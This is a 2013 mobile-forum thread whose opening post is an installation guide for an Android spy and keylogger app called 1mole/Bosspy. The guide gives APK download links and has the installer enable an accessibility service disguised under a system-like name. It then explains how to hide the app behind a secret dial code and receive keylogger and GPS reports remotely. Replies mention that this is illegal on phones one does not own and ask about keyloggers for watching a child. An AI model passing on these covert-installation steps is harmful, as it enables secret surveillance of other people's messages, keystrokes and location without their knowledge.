Srimeenakshimobiles - Creating Gsm Community  

Left Nav Home ForumsRules Register Mark Forums Read Right Nav

Left Container Right Container

Go Back   Srimeenakshimobiles - Creating Gsm Community » Xda & Pda section » OS Development » Android Phone    

The first spy software for Android 100% FREE FREE This is a Discussion on The first spy software for Android 100% FREE FREE within the Android Phone part of the OS Development forums; Installation Guide for Android OS ...

LinkBack Thread Tools Display Modes
Old 02-11-2013, 04:03 PM   #1

Send a message via ICQ to kanniappan Send a message via Yahoo to kanniappan Send a message via Skype™ to kanniappan
ArrowThe first spy software for Android 100% FREE FREE

Installation Guide for Android OS

User Guide
If you want to install the software version, please uninstall the previous version of the software currently present on the phone *.
1. Activate your phone and follow the instructions below: go Menu then Browser
2. Then, connect to Internet from your mobile and enter the URL of the site:

1mole version 1.0

- For Android 2.x: http://bosspy.com/downloads/1mole_2x.apk

- For Android 4.x: http://bosspy.com/downloads/1mole_4x.apk

3. Wait a few minutes during the download and then click 1mole_xx.apk file to start installing the software on your mobile.
4. Once the installation process is complete. Go to Settings->Accessibility and turn on the Services with the name is "com.android.preference.help".

5. At google search bar, type in access code to open the software Bosspy (default is #123456* ) Or you can dial the access code to open the software Bosspy.

or 6. In 1mole main screen, enter the email address and the password for your account Bosspy and click Login.

7. Click Settings to go to setting screen if you want to change configuration.
8. You can then set the range of updated GPS positions or turn off some options.

You can change the secret code used to open the software on the phone. You must format it as follows: # at the beginning of the code and * at the end. For example #345456*
9. After make all change you want, don’t forget click Save and Start to save all new setting and program begin to work.
10. Click Back to return to main screen and then click Exit to hide program interface.
11. You can now log into your account on the website Bosspy.com. Go to Settings page and config your smtp email account. And then you just need to wait a few hours to receive your first keylogger report.
You can download User Guide for Android OS here

/

kanniappan is offline   Reply With Quote
Old 05-26-2013, 08:26 PM   #2

Good info, but I would not recommend user use this cos it is not legal to spy on the cell that you do not own.
cuini2013 is offline   Reply With Quote
Old 06-27-2013, 02:41 PM   #3

Any advice for Mac spy software except the mobile spy above? I got a mac for my 11 year old girl, and I am looking for some keylogger that is compatible with Mac Leopard. I just need one to keep an eye on my little daughter. I got this keylogger Mac from a download website. Is it safe to use?
EmmaL is offline   Reply With Quote
Old 06-27-2013, 02:42 PM   #4

Quote:
Originally Posted by cuini2013 View Post
Good info, but I would not recommend user use this cos it is not legal to spy on the cell that you do not own.
agree.............
Old 07-30-2013, 03:01 PM   #5

I just download ikeymonitor on CNET. A perfect keylogger for iPhone.
Old 08-06-2013, 04:07 AM   #6

I can not install this software. even though I already have an account on bosspy.com trial. please help me. always a sudden close. if i install. I am using android os 4.0.4
staygilang is offline   Reply With Quote

LinkBacks (?)
LinkBack to this Thread: http://srimeenakshimobiles.com/forums/android-phone/51387-first-spy-software-android-100-free-free.html
Posted By For Type Date
?????? This thread Refback 09-01-2013 09:03 AM
The first spy software for Android 100% FREE FREE This thread Refback 02-11-2013 04:18 PM